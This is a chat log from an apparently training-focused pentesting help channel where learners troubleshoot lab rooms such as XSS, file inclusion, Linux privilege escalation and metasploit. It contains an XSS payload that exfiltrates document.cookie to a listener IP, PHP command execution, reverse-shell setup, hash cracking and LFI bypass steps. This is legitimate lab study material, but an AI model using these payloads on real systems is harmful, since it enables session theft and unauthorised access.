</textarea><script>fetch('http://10.8.193.69:9001?cookie=' + btoa(document.cookie) );</script>

#

yeah, but when i did it in the thm Attack box, it works ?

#

i don't get anything ..

#

ah okay

shadow echo
digital pendant
#

hmm, didn't get my own cookie

#

but i should put my vpn ip ?

#

unter the tab "access"

#

and:
nc -nlvp 9001

#

so strange

#

alright thanks

deep pike
#

@steel nymph thank you so much! I feel so dumb lol

next lanceBOT
#

Gave +1 Rep to @steel nymph

shadow echo
# digital pendant so strange

I don't think it matters, but maybe create a new ticket without the forward slash after the port number, I think that shouldn't matter, but worth a try.

digital pendant
#

@shadow echo @steel nymph thank you

next lanceBOT
#

Gave +1 Rep to @shadow echo

digital pendant
#

@steel nymph thank you

shadow echo
#

+rep @steel nymph

next lanceBOT
#

Gave +1 Rep to @steel nymph

shadow echo
#

I do it for you Junior 🙂

next lanceBOT
#

Gave +1 Rep to @shadow echo

digital pendant
#

alright that doesn't work as well 😅

shadow echo
digital pendant
#

yuo, curl works

#

@steel nymph that could be yes, i had to switch from VIP to regular server bc vip didn't work

zenith edge
#

Has anyone else run into this?

digital pendant
#

well, i already completed it and it works, but thanks anyway gus

zenith edge
#

I'm typing the code in as it says in the task or atleast I believe that I am?

errant plover
#

Hey guys quick question, I don't know if I should take this path or Pentest+ path. Begginer in sec, just completed pre security path

digital pendant
#

@zenith edge you should have "$" or "#" in your bash on the start of your line

alpine wyvern
#

Is anyone having OpenVPN issue? I even tried to redownload but it gives me a 404 an error occurred. Trying to get through the Jr. Pen Testing.

digital pendant
#

@alpine wyvern try switching VPN server, VIP servers sometimes have issues

zenith edge
#

Well ignore the ~

#

I hate that thing. Its always popping up right before I hit enter.

errant plover
#

The complete begginer one? Ive worked in networks and Im a developer atm. So I dont know if I need that

digital pendant
errant plover
#

Thanks man!

next lanceBOT
#

Gave +1 Rep to @steel nymph

opaque bone
#

Can anyone help me with task 6 in the subdomain enumeration room? 😅
I ran the ffuf command || with 472 after -fs || but it's not returning the subdomain

zenith edge
#

Thank you! Its running the scan now 🙂

next lanceBOT
#

Gave +1 Rep to @steel nymph

opaque bone
#

@steel nymph the given command is:
user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://MACHINE_IP -fs {size}

and I typed in:
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host:FUZZ.acmeitsupport.thm" -u http://10.10.27.150 -fs 472

#

nope nothing my output looks like Fenris's though

deft valley
#

try to run without fs

steel ice
#

check the wordlist path if you aint using the attackbox

modest arch
modest arch
copper crater
opaque bone
#

@modest arch I can't post a picture for some reason but my output looks like this ||and the size for each one is 472||

#

alright I'll give it another try

zenith lodge
opaque bone
#

🤔
Alright I'll give that a try as well! Since I've had mine open for quite some time from other tasks

wheat wigeon
#

Hello guys im getting some troubles with the SUID PrivESC of Linux room, may I get some help? I've tried: fnd / -type f -perm -04000 -ls 2>/dev/null which lists the files that have the SUID bit set, however nano doesn't appear in those files even tho the example is using nano, and also none of the files seems to be exploitable following gtfobins, only base64 but it won't allow me to exploit it since i cant use sudo, may i get some hint? Ty in advice!

drifting drum
wheat wigeon
next lanceBOT
#

Gave +1 Rep to @drifting drum

pearl compass
#

can anyone help with file inclusion the last task

drifting drum
#

What about it?

pearl compass
#

@drifting drum this is what I get back

brazen notch
#

@pearl compass think I could ask you for help on challenge 3?

drifting drum
drifting drum
brazen notch
#

I struggled on it a couple days ago, I'll come back to you in like 5 minutes to make sure I can describe what I was running into properly.

drifting drum
pearl compass
drifting drum
#

You can't expect a .txt file to be ran as code

#

Because it's not code

#

It's just text

#

If you want your code to be ran, you'll need to actually supply code

#

Most webservers can interpret php. So you'll probably wanna use that

pearl compass
#

I put || <?php echo shell_exec("hostname");?> ||

#

inside the text document

drifting drum
#

Yea,but you called it .txt

#

Which means it's interpreted as text

#

Really? I thought it dosent

#

Good point

pearl compass
#

@steel nymph || <?php echo shell_exec("hostname");?> ||

#

I'd have to look

#

the server || python command isnt running in the command line so id have to fix that as weel||

#

well

#

I cant get that command to work on the attack box or the kali vm

modest arch
#

Hello everyone, I'm having an issue with john the ripper and section 7 of the Linux PrivEsc chapter. I collected the passwd and shadow files and fed them john and retrieved the gerry user accounts password but not user2's, I do however know the password to user2 is in the wordlist. I'm also fairly confident I set the type correctly as sha512crypt... any ideas as to why john is not working for me?

#

indeed

#

I was able to get 1 out of 3 user accounts, alas not the one I needed

#

I tried, only shows 1 cracked hash and 2 uncracked

#

|| test ||

#

ok

pearl compass
#

@steel nymph i tried the simplehttpserver and it returned: no module named simplehttpserver

modest arch
#

|| gerryconway:$6$vgzgxM3ybTlB.wkV$48YDY7qQnp4purOJ19mxfMOwKt.H2LaWKPu0zKlWKaUMG1N7weVzqobp65RxlMIZ/NirxeZdOJMEOp3ofE.RT/:1001:1001::/home/gerryconway:/bin/sh
user2:$6$m6VmzKTbzCD/.I10$cKOvZZ8/rsYwHd.pE099ZRwM686p/Ep13h7pFMBCG4t7IukRqc/fXlA1gHXh9F2CbwmD4Epi1Wgh.Cl.VV1mb/:1002:1002::/home/user2:/bin/sh
karen:$6$VjcrKz/6S8rhV4I7$yboTb0MExqpMXW0hjEJgqLWs/jGPJA7N/fEoPMuYLY1w16FwL7ECCbQWJqYLGpy.Zscna9GILCSaNLJdBP1p8/:1003:1003::/home/karen:/bin/sh ||

|| john -w /usr/share/wordlists/rockyou.txt --format=Sha512crypt unshadow.txt ||

#

tried that too, it runs as tricode

#

its so weird

#

i even know the passwords and know they are in the wordlist

#

I wish I knew what it was

#

I tried on both the attack boxes

#

about to spin up my own vm

#

i think I did last night but I'll try again

pearl compass
#

@steel nymph i got the server to work on 1337 and im guessing i need to use the same port on the address to

bitter plank
#

Giving up on SSRF Room 😑

pearl compass
bitter plank
#

Making some silly mistake @steel nymph 😑

brazen notch
#

@drifting drum .... thanks anyway... i went back through the other challenges and figured it out. /facepalm

next lanceBOT
#

Gave +1 Rep to @drifting drum

bitter plank
#

Yes I Can see the changes but no idea what to change 😑

pulsar glacier
#

Hey, i'm doing the Junior Penetration Tester path, and i'm in the xss module task 8, i have the problem that there are no "staff" actions happening here like expected. I dont get the http request from the server only the dns, the xss code is right, because i can see the request when i open the tickets self instead the "staff"

#

restarted 4 times...

#

waited different times, tested on nc and 10.10.10.100

#

yea, but we need the flag to complete the room

#

really... after restarting 5 times and frustrating over an hour now...

#

GET /?cookie=YWRtaW49ZmFsc2U7IHNlc3Npb249YmUzZDE1OGUzY2RlODIxOGNmNGNjMTExNTcyYzY0YjU= HTTP/1.1

#

its only my own, does someone can pm me the flag? thanks

brazen notch
#

So, for the 4th challenge on task 8 of file inclusion, am I supposed to establish a reverse shell to gather the hostname flag? or, am I supposed to just supply code for it to display in a curl response / on the web page?

#

@steel nymph I was trying to use the php reverse shell from the reverse shell cheatsheet and can't seem to get it to phone home, and I'm not quite sure where I'm going wrong. I've set up a couple other reverse shells, and I have the http server up and running so the file should be reachable, but I'm not getting any response on my nc listener.

#

Yeah... I think there's an error with the shell code.

modest arch
#

last question of the metasploit module.... i have a meterpreter session, but how do i get hashdump to work here? It asks for a session...

shadow echo
wheat wigeon
#

Hi! Any idea of why the crontab PrivEsc in linux may not be working?

#

I just changed any of the root files for a reverse shell and started the nc listener in the atacking machine but is not working

modest arch
#

thanks

wheat wigeon
#

Oh dear...

#

that must be it

modest arch
#

am i doing something wrong

wheat wigeon
#

yeah def that was it, working now, thx for helping always dude

next lanceBOT
#

Gave +1 Rep to @tulip elm

wheat wigeon
# modest arch am i doing something wrong

you can do it two different ways, if its a windows, you gotta make sure you're running on an NT AUTHORITY SYSTEM process if im not wrong and also you can use just hashdump in the meterpreter or using a post/windows/gather/hashdump and link it to the meterpreter session, if its a linux you gotta use the post/linux/gather/hashdump module and link it to the meterpreter session

lone river
wheat wigeon
#

you can also try to load kiwi and use mimikatz but i didnt need to

modest arch
#

yup yup i get the module i need to use, i just cant get to it from here

wheat wigeon
modest arch
#

yes

wheat wigeon
#

yup

#

my issue was i wasnt using the same payload in the meterpreter as in the msfvenom payload

#

check it out

modest arch
#

yeah i set that

wheat wigeon
#

that was making the session unstable and not able to work with the post module

modest arch
#

||set payload linux/x86/meterpreter/reverse_tcp
||

wheat wigeon
#

are you getting any error?

modest arch
#

no errors, just not backgrounding

#

hold up

wheat wigeon
#

do you get a reverse shell at all?

modest arch
#

nah still no prompt

#

yea

shadow echo
# modest arch it seems stuck here

Uhm, well you could try to run the initial exploit where you get the meterpreter session with run -j (I believe it was to run it as a background job) so that it will be in the background already.

modest arch
#

ah

#

ok let me try

wheat wigeon
#

if that doesn't work either restart the machines and hit me up in dm so i can try to help you if u want to

modest arch
#

ooooo

#

hang on hang on lads, i think we are getting somewhere

#

omg, thanks everyone, it worked

wheat wigeon
#

I just want to return all the help that i've got during my path

#

😎

wheat wigeon
modest arch
#

just the session wasn't backgrounding properly. -j helped

wheat wigeon
#

Nice!

#

Glad it worked

modest arch
#

me too! is 00:30 and im up in 6 hours, i better goto sleep

#

nite and thanks again

wheat wigeon
#

Nite P:

brazen notch
#

@steel nymph i figured it out. was an error in the php shell code, i think i accidentally deleted a semicolon.

hot grail
#

I am in the Attactive Directory room and when I try to run GetNPUsers.py I am getting this error:

#

python3 GetNPUsers.py spookysec.local/svc-admin -no-pass 1 ⚙
Impacket v0.9.24.dev1+20211026.122819.ea023b28 - Copyright 2021 SecureAuth Corporation

[*] Getting TGT for svc-admin
[-] [Errno Connection error (SPOOKYSEC.LOCAL:88)] [Errno -2] Name or service not known

#

This has happened on my VM as well as my kali desktop and the THM browser. Has anyone else ran into this problem?

urban snow
dusk flame
#

Hey can anyone help me

#

super quick question

shadow echo
pearl compass
#

@urban snow yes I did thank you for reaching out

next lanceBOT
#

Gave +1 Rep to @urban snow

deep scaffold
dusk flame
#

Using burpsuite to change the method tofrom get to post and putting file in but not getting a file output

#

file inclusion task 8 flag 1

deep scaffold
shadow echo
deep scaffold
dusk flame
dusk flame
deep scaffold
deep scaffold
dusk flame
deep scaffold
#

ok

dusk flame
dusk flame
# deep scaffold ok

so im thinking that im putting it in the wrong spot or just doing something completely wrong

rustic summit
#

Hi,
Regarding the XSS room (Jr Pen. Tester path):
The last task seems broken. Is it just for me?
The request catcher doesn't get any HTML requests (only DNS) and a netcat listener on my local machine only gets my own cookie instead od the staff-cookie.

Can anyone please help?
Thx!

dusk flame
deep scaffold
deep scaffold
rustic summit
deep scaffold
viscid igloo
#

took a few tries but I got it to work as well

slow crow
#

Hi guys, did anyone ran into a ffuf not giving results in "Authentication Bypass" room? (task 3)

left nexus
#

Hi everyone, so I am trying to complete the "Walking Application Room" but I keep running into an issue. When I run on my Kali, it says packet filtered even though I have connected using openvpn

#

but tryhackme attackbox, it pings correctly. What do you recommend i do to fix the issue on my Kali?

unique steppe
#

Task 4 curl 2 requests, the curl command is properly typed in, I can’t get the green popup to say that the password reset email sent to attacker@hacker.com

left nexus
#

I fixed it nvm

oak shard
#

Hi everyone , I need your help. After starting the machine on "Content Discovery". When I try to open the link I get 'ERR_CONNECTION_TIMED_OUT' or browser cannot connect to server . How do I resolve this ? @primal whale , @heavy night

copper garnet
#

ssrf task 2 is somewhat difficult for me
nvm, solved

noble rose
oblique needle
#

Wow that blind time based SQL injection took me so long to realize the issue, but if anyone gets stuck on that last task, remember to remove the table/column enumeration code and just do the account code standalone, not sure if it's just my brain that struggled with that or what

exotic scroll
#

is anyone having problem with the server? i am doing Linux PrivEsc Cron. Tried using attackbox but getting connection error. Tried using my kali machine and can't get a reverse shell

exotic scroll
#

Trying to finish this tonight

oak shard
zealous marsh
verbal scroll
#

I've been going for the past 2 hours without issues on a Kali box, but I've been working slowly

exotic scroll
#

oh now attackbox is working.

#

spoke too soon.. sigh

noble rose
exotic scroll
#

i use nc on my kali vm. still can't connect to attackbox

noble rose
#

Eyyy just reached top 1% rank

oak shard
#

@noble rose @zealous marsh . It’s now working okay !!

Maybe it was my home wifi, currently using the office wifi .

winter spade
#

Thank you for posting this... I'm not sure why but ||table_name like 'a_a_y_i_s%';--|| was working for me and I was like "wow this can't be right" 😂

next lanceBOT
#

Gave +1 Rep to @small scroll

loud spire
modest arch
#

Anyone has done the Linux Privesc room?

north dove
#

are u stuck somewhere?

modest arch
#

yes, can I DM you?

loud spire
#

What would be the name of the executable you would place in that folder?

#

i have given name as executable.exe

#

but it's expecting something else

modest arch
#

@north dove

#

can I DM you?

north dove
#

yeah sure

tulip basin
#

Hi, for the meterpreter room, i run the exploit but it show this, can i have any idea why is this happened? Thank you in advanced.

meterpreter > sysinfo
[-] Unknown command: sysinfo.
meterpreter > [-] Failed to load extension: No response was received to the core_loadlib request.
[-] Failed to load extension: No response was received to the core_enumextcmd request.

#

did i missed something?

quick light
north dove
#

nfs may be a bit tricky..i spent 4hours doin that! just because i have a shit PC and a shit network that freezes the whole PC everytime i did nfs

quick light
north dove
#

give suid perms

#

and run it from the shared dir of karen

quick light
#

yeah done that

#

it gives normal shell

north dove
quick light
north dove
quick light
#

cool

north dove
#

see if the s is small

#

and not big

dull fjord
north dove
#

that's it

#

nothing else

dull fjord
#

RIP lol

quick light
# dull fjord

I got the same 3 things and two tickets each of the remaining ones

#

but I do have two rooms remaining

dull fjord
#

Good luck! It was fun anyway

quick light
#

thanks btw

north dove
quick light
north dove
#

8years old

#

feel my paincri

quick light
#

feeling it

sage citrus
#

Couldnt get this one can you please explain it again 😅

shadow echo
loud spire
#

thank you @deep scaffold

next lanceBOT
#

Gave +1 Rep to @deep scaffold

tulip basin
#

Ok, let me break it down.

novel rover
next lanceBOT
#

Gave +1 Rep to @wraith ice

tulip basin
#

This is spoiler for LFI challenge 3. Inform me if this cant be posted here and correct me if i got anything wrong.

|| Run your burp. Next, in inspector or F12 in Mozilla, expand the the lines of code. Go to the method, change GET to POST. Press include button to let burp catch it. Then in burp, go decoder and encode your path in URL. After encode, copy the encoded URL and paste it on the "file" parameter in the captured request. Then add "%00" behind the string. Then its done. ||

shadow echo
tulip basin
#

as in the question provided

shadow echo
shadow echo
tulip basin
shadow echo
tulip basin
#

Hmm

#

i should get a try

shadow echo
tulip basin
#

inside vm

shadow echo
# tulip basin inside vm

I mean I will try it with my own VM again, as I can't remember if there was anything else to do in order to get it to work, but trying it with the attackbox meanwhile might be worth a try

tulip basin
#

yea, ill try it soon. was working on other thing rn.

modest arch
#

Q on Authentication Bypass Task 5:
Why is the output of echo '{"id":1,"admin":true}' | base64 not the same as the accepted answer from base64encode.org ?

modest arch
# idle bison echo adds a newline
  1. How can I suppress this?
  2. I used the same method for the previous task echo VEhNe0JBU0U2NF9FTkNPRElOR30= | base64 -d and it got me the right answer. Why is that?
idle bison
#

Because \n is a character that would be encoded into base64

#

But it doesn't matter for decoding because it's not a part of base64?

#

Read the manual for echo.

modest arch
modest arch
#

Q on File Inclusion task 8

slender kettle
#

Can anyone in the Burp Intruder room help?
Task 10 the example does not work for me:

deep scaffold
#

have you tried -v and or lowering the number of threads? answer should come in less then a min normally

drifting drum
#

Lol.

next lanceBOT
#

Gave +1 Rep to @deep scaffold

drifting drum
#

By default, hydra will print the credentials it found after it finishes running through the entire wordlist. With -v it will print them out as soon is it finds them. With -V it will print every login attempt

#

Np

light fiber
#

Was wondering if someone could explain a concept to me. In the burp suite repeater room, in the extra mile task, there's a bit where it tells you to enter four nulls to keep the query from erroring out. Why does it error out without the nulls? Where does the number 4 come from?

lyric crypt
#

for task 8 in LFI i guess using curl is easier

deep scaffold
deep scaffold
next lanceBOT
#

Gave +1 Rep to @deep scaffold

lyric crypt
shadow echo
#

Somehow I have a logic issue with SQL. Lets say I have access to 2 databases, shop and staff. Both of these databases have a table called user. If I query Select * from user; Would that give me back both tables or only from one of the databases? In case it gives me back only the table of a single database and I want to get the user table of the other database, would I have to specify Select * from staff.user; ? Any help would be much appreciated.

deft valley
shadow echo
deep scaffold
shadow echo
deep scaffold